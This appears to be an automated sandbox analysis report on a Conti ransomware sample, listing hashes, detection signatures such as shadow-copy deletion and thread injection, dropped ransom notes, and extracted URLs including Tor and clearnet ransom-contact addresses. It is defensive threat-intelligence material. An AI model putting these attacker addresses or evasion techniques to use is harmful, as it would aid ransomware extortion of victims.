Analysis Report 7906dc47_by_Libranalysis

Overview

General Information

Sample Name: 7906dc47_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 419877
MD5: 7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1: e7304e2436dc0eddddba229f1ec7145055030151
SHA256: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
Infos:

Most interesting Screenshot:

Detection

Conti
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Yara detected Conti ransomware
Contains functionality to create processes via WMI
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Suspicious Svchost Process
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shadow Copies Creation Using Operating Systems Utilities
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 7906dc47_by_Libranalysis.exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Downloads\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\taskhostw.exe File created: C:\Users\Public\readme.txt
Source: 7906dc47_by_Libranalysis.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058206B2 FindFirstFileExW, 2_2_000001BB058206B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW, 2_2_000001BB058906B2
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C4106B2 FindFirstFileExW, 3_2_0000024D2C4106B2
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF06B2 FindFirstFileExW, 4_2_0000024843FF06B2
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A06B2 FindFirstFileExW, 11_2_0000020A025A06B2
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB06B2 FindFirstFileExW, 30_2_00000255F9EB06B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW, 2_2_000001BB0582016A

Networking:

barindex
Found Tor onion address
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzj
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://amplify-imp.outbrain.com/pixel?p=nlV1YHXXXKgnJTkmjxGkpD86h377hQIinq23IJiX9nqxEkupAtbFH4fSP0Iz
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://b1-use2.zemanta.com/bidder/win/outbrainrtb/c333bcb0-98dc-11e9-8919-320929a4a620/0.564833/3F66
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272901005.00000255FA2F8000.00000002.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0E
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0F
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0M
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: taskhostw.exe, 0000001E.00000002.501238733.00000255FA2F0000.00000008.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: taskhostw.exe, 0000001E.00000000.273188144.00000255FA370000.00000008.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
